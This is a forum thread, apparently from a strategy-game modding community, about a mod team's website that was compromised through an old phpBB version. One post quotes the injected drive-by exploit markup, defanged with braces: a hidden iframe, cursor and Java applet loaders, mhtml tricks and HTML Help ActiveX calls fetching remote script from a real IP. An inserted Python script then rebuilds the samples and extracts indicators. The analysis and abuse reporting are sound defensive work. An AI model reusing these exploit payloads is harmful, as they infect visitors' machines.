
Kevin Mc Carthy

Former SF Weapons Sergeant
13 Badges
Jun 25, 2001
3.808
0
  • Arsenal of Democracy
  • Deus Vult
  • Europa Universalis III
  • For the Motherland
  • Hearts of Iron III
  • Europa Universalis III Complete
  • Europa Universalis III Complete
  • Victoria: Revolutions
  • Semper Fi
  • Victoria 2
  • 500k Club
  • Europa Universalis III: Collection
  • Hearts of Iron II: Beta
Last edited:
bump
 
Bump again. BTW I am a CORE developer...
 
Hmmm, sounds nasty. What action is being taken?
 
Sir Humphrey said:
Hmmm, sounds nasty. What action is being taken?

Steel, the site owner has to 'fix' it. Nobody else can do anything.

I know he does some international travel in his work sometimes, haven't heard back from him.
 
Kevin,

Instead of continually bumping this, would you like me to sticky it here for you?

Not sure when I'll check back in here, so PM me if you'd like it stuck.

Stonewall.
 
Stuck as requested. Please let me know when the CORE website is functional again and I'll take this down.
 
Going there with Firefox and it asks me to download newexpl.php. When I googled newexpl.php it looks like someone hacked a trojan downloader onto the site or perhaps it's coming from an advertiser. Hard to say without more info.
 
Not that I know of.
 
|AXiN| said:
Firefox pops up a download window, so I think FF guys can go there fine as long as they cancel it.
Same thing with Opera (but need about eight "cancel"s).
 
The culprit seems to be in the title of the V.I.P. forum, so I think only pages showing that title (for example the forum index) will cause problems. A moderator with sufficient privileges, or the site owner, could change the title back.

The initial offending code is (I changed the <> parts of the HTML tags to {} to avoid it being accidentally triggered):
Code:
{span class="genmed"}This forum is for V.I.P. (Victoria Improvement Project) for Victoria{iframe src="http://195.95.218.173/dl/adv439.php" width=0 height=0 style="display:none"}{/iframe}{/span}

That inline frame then proceeds to load the following:
Code:
{html}{head}
{/head}{body}
{style}
* {CURSOR: url("http://195.95.218.173/dl/adv439/sploit.anr")}
{/style}
{script}
try{
document.write('{applet'+' width=1 height=1 '+'ARCHIVE=loader'+'adv439.jar co'+'de=Counter}{/AP'+'PLET}');
document.write('{object data="&#'+109+';s-its:mhtml'+':'+'file://C:\nosuch.mht!http://195.95.218.173/dl/adv439/x.chm::/x.htm" type="text/x-scriptlet"}{/object}');
}catch(e){}
{/script}
{IFRAME SRC="http://195.95.218.173/dl/newexpl.php?adv=adv439" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"}{/IFRAME}
{/body}{/html}

I'm no expert on this but I think several exploits are being tried here: something with a cursor image loading, a Java applet that tried to stay under the radar by having its code obfuscated, something possibly trying to execute code on your machine by creating an error and pretending to be the proper error page, and finally the newexpl.php thing.

The newexpl.php contains a base64 encoded piece of HTML, which decoded looks like this:
Code:
{!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"}
{HTML}{BODY}
{OBJECT style="display:none" id="asdqwe" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"}
{PARAM name="Command" value="Related Topics, MENU"}
{PARAM name="Button" value="Text:_"}
{PARAM name="Window" value="$global_blank"}
{PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm"}
{/OBJECT}
{OBJECT style="display:none" id="asdqwer" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"}
{PARAM name="Command" value="Related Topics, MENU"}
{PARAM name="Button" value="Text:_"}
{PARAM name="Window" value="$global_blank"}
{PARAM name="Item1" value='command; javascript:execScript("document.write(\"{script src=http://195.95.218.173/dl/adv439/JQTmudI.jpg\"+String.fromCharCode(62)+\"{/scr\"+\"ipt\"+String.fromCharCode(62))")'}
{/OBJECT}
{script}asdqwe.HHClick();setTimeout("asdqwer.HHClick()",100);setTimeout("document.write('')",200){/script}{/BODY}{/HTML}

Again this seems to try several exploits, all originating from 195.95.218.173 (a computer in Estonia). An abuse report could be sent to abuse@esthost.com, but since I am but a mere visitor of the site, I think it would be better if someone more officially affiliated with it would do so.

EDIT: By the way, turning off inline frames should prevent the problem, and going to the C.O.R.E. for HoI 2 forum directly should work too. Do it at your own risk though. If your browser is broken and executes things without asking you first, and you accidentally go to the forum index, you could trigger all those exploits.
 
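The post above does its analysis by hand: spot the hidden iframe in the forum title, re-join the split-up document.write() strings, decode the base64 page, and pull out the host to report. The script below is an added example (not code from the thread or from the CORE site) that automates those four steps so a forum admin can check a page dump without loading it in a browser. The samples it scans are constructed to match the markup quoted in the post, with the documentation address 192.0.2.10 standing in for the real host; nothing is fetched from the network.

```python
import base64
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the injected forum-title markup quoted in the post.
# 192.0.2.10 (a documentation address) stands in for the real server; nothing is fetched.
INJECTED_TITLE = (
    '<span class="genmed">This forum is for V.I.P. for Victoria'
    '<iframe src="http://192.0.2.10/dl/adv439.php" width=0 height=0 '
    'style="display:none"></iframe></span>'
)

# Constructed sample of the loader script, split into string fragments the way the post shows.
LOADER_SCRIPT = r"""
try{
document.write('<applet'+' width=1 height=1 '+'ARCHIVE=loader'+'adv439.jar co'+'de=Counter></AP'+'PLET>');
document.write('<object data="&#'+109+';s-its:mhtml'+':'+'file://C:\nosuch.mht!http://192.0.2.10/dl/adv439/x.chm::/x.htm" type="text/x-scriptlet"></object>');
}catch(e){}
"""

# Constructed stand-in for the decoded body of newexpl.php, re-encoded so the decode step runs.
NEWEXPL_DECODED = """<HTML><BODY>
<OBJECT style="display:none" id="asdqwe" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
</OBJECT>
<OBJECT style="display:none" id="asdqwer" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Item1" value='command; javascript:execScript("document.write(\\"<script src=http://192.0.2.10/dl/adv439/JQTmudI.jpg>\\")")'>
</OBJECT></BODY></HTML>"""
NEWEXPL_B64 = base64.b64encode(NEWEXPL_DECODED.encode()).decode()


class HiddenFrameFinder(HTMLParser):
    """Collect the src of every iframe that is zero-sized or styled display:none."""

    def __init__(self):
        super().__init__()
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        zero_sized = a.get("width", "").strip() == "0" or a.get("height", "").strip() == "0"
        invisible = "display:none" in a.get("style", "").replace(" ", "").lower()
        if zero_sized or invisible:
            self.hidden.append(a.get("src", ""))


def find_hidden_iframes(markup):
    p = HiddenFrameFinder()
    p.feed(markup)
    p.close()
    return p.hidden


_WRITE = re.compile(r"document\.write\((.*?)\);", re.S)
_PIECE = re.compile(r"'((?:\\.|[^'\\])*)'|(\d+)")


def deobfuscate_document_write(script):
    """Re-join 'a'+'b'+123 concatenations and resolve char refs such as &#109; (the 'm' of ms-its)."""
    out = []
    for args in _WRITE.findall(script):
        joined = "".join(s if s else n for s, n in _PIECE.findall(args))
        out.append(html.unescape(joined))
    return out


def decode_base64_page(blob):
    """newexpl.php served its HTML base64-encoded; decode it so it can be scanned like plain markup."""
    return base64.b64decode(blob).decode("latin-1")


def indicators(markup):
    """Return (ActiveX classids, hosts) referenced by the markup: what an abuse report needs."""
    classids = set(re.findall(r'classid="clsid:([0-9a-f-]+)"', markup, re.I))
    hosts = {urlparse(u).hostname for u in re.findall(r"https?://[^\s\"'<>\\]+", markup)}
    return classids, hosts


def analyse():
    frames = find_hidden_iframes(INJECTED_TITLE)
    writes = deobfuscate_document_write(LOADER_SCRIPT)
    page = decode_base64_page(NEWEXPL_B64)
    classids, hosts = indicators(INJECTED_TITLE + "".join(writes) + page)
    return {"hidden_iframes": frames, "writes": writes, "classids": classids, "hosts": hosts}


if __name__ == "__main__":
    for name, value in analyse().items():
        print(name, value)
```

Run against a saved copy of the forum index (or the phpBB forum description fields in the database) instead of the constructed samples, the hidden-iframe check is the quick test for whether the injection is still present, and the host set is the list to put in the abuse report.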
..........wow...........
 
Well as long as some progress is being made in the right direction. :)
 
I wish I understood what he was talking about.
 
The problem should be eliminated now.

Stonewall- You can de-sticky this now.
 
JRaup said:
The problem should be eliminated now.
Actually, the forum still runs on phpBB 2.0.11 which is how someone managed to get administrator rights and place that exploit there in the first place. I recommend the forum software is updated to phpBB 2.0.16, several security issues (of which some critical) were fixed since phpBB 2.0.11.
 
Actually if you go straight to the forum, it's okay.